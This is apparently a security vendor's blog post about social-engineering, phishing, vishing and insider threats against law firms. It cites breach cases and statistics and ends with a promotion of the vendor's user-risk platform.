The Top User-Driven Cyber Threats Targeting Law Firms

Law firms have become among the most prized targets for cybercriminals, and the reason has little to do with technical vulnerabilities. Attorneys and staff hold corporate trade secrets, unreleased M&A intelligence, intellectual property, and private client records – a combination of data that commands exceptional value on criminal markets. Attackers have recognized that the fastest path into a law firm is not through its perimeter defenses; it is through the users who manage, share, and act on that data every day.

Trusted with some of the most sensitive data imaginable, it is no surprise that 36% of law firms reported experiencing a security incident in 2024 and the FBI has issued active warnings about organized threat groups specifically targeting the sector. The average cost of a law firm data breach has reached $5.08 million, and the consequences extend well beyond the financial loss.

High-profile incidents demonstrate what a single User Layer failure can trigger inside firm environments. The Grubman Shire Meiselas & Sacks breach triggered a $42 million ransom demand after attackers accessed celebrity contracts and NDAs. The Orrick, Herrington & Sutcliffe compromise exposed the personal information of over 630,000 individuals and resulted in an $8 million settlement. The Gunster Yoakley & Stewart breach allowed attackers to move undetected through the firm's document management system for weeks, ultimately compromising the personal information of 746,000 individuals and resulting in an $8.5 million settlement.

Law firms operate on trust, and that trust has become the primary attack surface. Social engineering attacks, which exploit human behavior rather than technical weaknesses, are the dominant threat vector facing the legal industry today – and the four vectors below highlight where that risk is most concentrated in 2026.

How Attackers Target Law Firm Users

Legal professionals face a distinct set of user-driven threats that exploit the industry’s core dynamics: high-trust client relationships, time-sensitive financial workflows, and a concentration of privileged data that carries far-reaching consequences when exposed. The four vectors below represent the leading attack types targeting law firms today.

Business Email Compromise and Wire Fraud

Business email compromise (BEC) is a cyberattack in which an attacker impersonates a trusted party, such as a client, managing partner, or transaction counterparty, via email to fraudulently redirect payments or extract sensitive information. Attackers typically gain visibility into a firm's email environment through credential theft, dark web markets, or OSINT reconnaissance, then monitor internal communications to identify high-value financial events – retainer payments, settlement disbursements, M&A closings, or escrow releases – before sending fraudulent payment instructions. In account takeover cases, attackers lurk inside compromised inboxes for weeks, familiarizing themselves with vendor relationships, payment processes, and key personnel before acting.

Law firms are structurally ideal BEC targets. They concentrate high-value financial activity inside authorization workflows driven almost entirely by email, and attorneys and paralegals routinely act on last-minute instructions under time pressure – court deadlines, closing dates, client urgency – with little opportunity for independent verification. The FBI's IC3 has documented over $55 billion in global exposed BEC losses over the last decade, including nearly $2.8 billion in 2024 alone. For law firms, where a single fraudulent wire can trigger fiduciary liability and bar disciplinary action on top of the financial loss, the stakes go far beyond the dollar amount.

Spear Phishing and Document Workflow Exploitation

Phishing remains the single most common entry point for cyberattacks against law firms, but the threat has evolved well beyond generic credential harvesting. Inside Access, Dune’s 2025 Insider Threat Intelligence Report found that AI-personalized phishing emails drive three times more user interaction than traditional, templated variants, and in the legal sector, that personalization is devastatingly effective. Using the same OSINT and reconnaissance techniques described above, adversaries craft messages impersonating clients, opposing counsel, court officials, or e-discovery platforms with enough contextual accuracy to bypass scrutiny. A paralegal receiving what appears to be a document review request from a known client, or an associate clicking a link appearing to originate from a court filing system, is acting within entirely normal professional routines. That is precisely what makes the attack effective.

The document-centric nature of legal work creates a heightened phishing surface that does not exist in most other industries. Law firms exchange contracts, NDAs, court filings, due diligence packages, and settlement agreements at high volume, often with external parties not subject to the firm’s own security controls. Attackers exploit this by inserting malicious documents into review workflows, spoofing e-discovery platforms, and embedding credential harvesting links inside routine signature requests. The FBI has also warned of active fake prospective client schemes targeting law firm intake teams with fraudulent engagement documents that appear legitimate until credentials are compromised.

GootLoader, a malware delivery framework that has been actively targeting legal professionals since 2020 and continues to evolve through 2026, has seeded malicious content linked to 3.5 million search terms – a high percentage of which are legal terms. Document exploitation here requires no email, no phone call, and no direct contact whatsoever. An attorney or paralegal searching for a specific contract template or legal filing may find a GootLoader-infected file sitting at the top of their search results, indistinguishable from a legitimate source, exploiting only the reasonable assumption that a top search result can be trusted.

Vishing and AI-Powered Voice Impersonation

Voice phishing (vishing) attacks surged 442% in 2025 as AI voice cloning lowered the barrier to high-quality impersonation, with global losses from deepfake-enabled voice fraud exceeding $200 million in the first quarter of 2025 alone. Law firms are particularly susceptible: attorney names, titles, client relationships, and even communication styles are often publicly accessible through firm websites, LinkedIn, and court records, giving attackers everything they need to build a credible pretext before making a single call.

Luna Moth, also tracked as Silent Ransom Group, is among the most active threat groups targeting the legal sector through this vector. In March 2025, the FBI's Cyber Division issued a warning to U.S. law firms about a targeted campaign in which the group evolved from callback phishing to direct vishing calls, impersonating IT personnel to convince employees to establish remote access sessions under the pretext of a fabricated technical issue. Between April 2024 and April 2025, the legal sector accounted for more than 40% of Luna Moth documented victims, with ransom demands ranging from $1 million to $8 million per incident. Once access is granted, the group exfiltrates data silently using legitimate tools like WinSCP and Rclone, rarely triggering security alerts.

Broader vishing campaigns extend well beyond Luna Moth, with AI-generated voice calls impersonating judges, opposing counsel, regulatory bodies, and senior firm leadership becoming an increasingly documented threat across the legal sector. As the cost of a convincing impersonation approaches zero, vishing will only become more frequent and harder to distinguish from legitimate contact. For law firms, where a single call can authorize a wire transfer or expose privileged case strategy, the consequences of a moment's misplaced trust are exceptionally high.

Insider Threats and Lateral Data Exfiltration

Malicious insider attacks are the most expensive breach type to remediate across industries, averaging $4.92 million per incident. Negligent insiders who misconfigure cloud repositories, forward privileged documents to personal accounts, or approve access without verification do not intend harm – but the legal consequences of their decisions are the same. High attrition, lateral movement across systems, and fluid client portability all create persistent data exfiltration risk for the legal industry that legacy tools cannot address.

Once internal access is exploited – whether through malicious intent, negligence, or a compromised credential – lateral movement expands across case management systems, shared drives, and client portals, compounding the scope of exposure well beyond the initial point of compromise. The Proskauer Rose cloud misconfiguration incident, in which 184,000 privileged client files were accessible via a public URL for six months without detection, reflects how consequential routine access and workflow decisions can be when made without security awareness. In a law firm context, that data is not just sensitive; it is legally protected, subject to bar association obligations, and deeply consequential to ongoing litigation or deal processes if compromised.

Building Resilient Defenses for the Modern Law Firm

The legal sector’s threat landscape has fundamentally changed, and the defense model has to change with it. Annual courses and periodic phishing simulations do not address BEC attacks engineered around the firm’s own wire approval workflows, AI-generated impersonation of known clients, active FBI-warned vishing campaigns, or the behavioral signals that precede insider-driven data exfiltration. A firm whose security posture relies on annual training for a workforce that changes continuously through lateral hires, departures, and secondments is not managing user risk. It is checking compliance boxes.

Every user inside a law firm carries a different risk profile. A first-year associate processing routine correspondence, a senior partner approving client fund transfers, a billing coordinator managing vendor invoices, and an IT administrator with elevated system access are not the same target, and cannot be given the same risk remediation pathways. The real attack surface has always been the User Layer: the judgment calls made under pressure, the approvals given to external parties, the access held by someone who submitted their resignation last week. As AI expands both the attack surface and the sophistication of threats, static defenses are not just insufficient – they are obsolete.

Dune Security stops social engineering and insider threat across every channel. Our platform calculates a dynamic risk score for every human and agentic user based on role, behavior, and exposure across five core pillars: business impact, agentic attack simulations, training activity, external security integrations, and historical risk data. Legal security and compliance teams use that score to focus effort on the people who actually drive risk, while targeted interventions protect attorneys, paralegals, and staff without adding friction. High-risk users face escalations including increased User Adaptive Training, access restrictions, and dynamic enforcement. The old playbook is irrelevant. Dune is what’s next for law firm defense.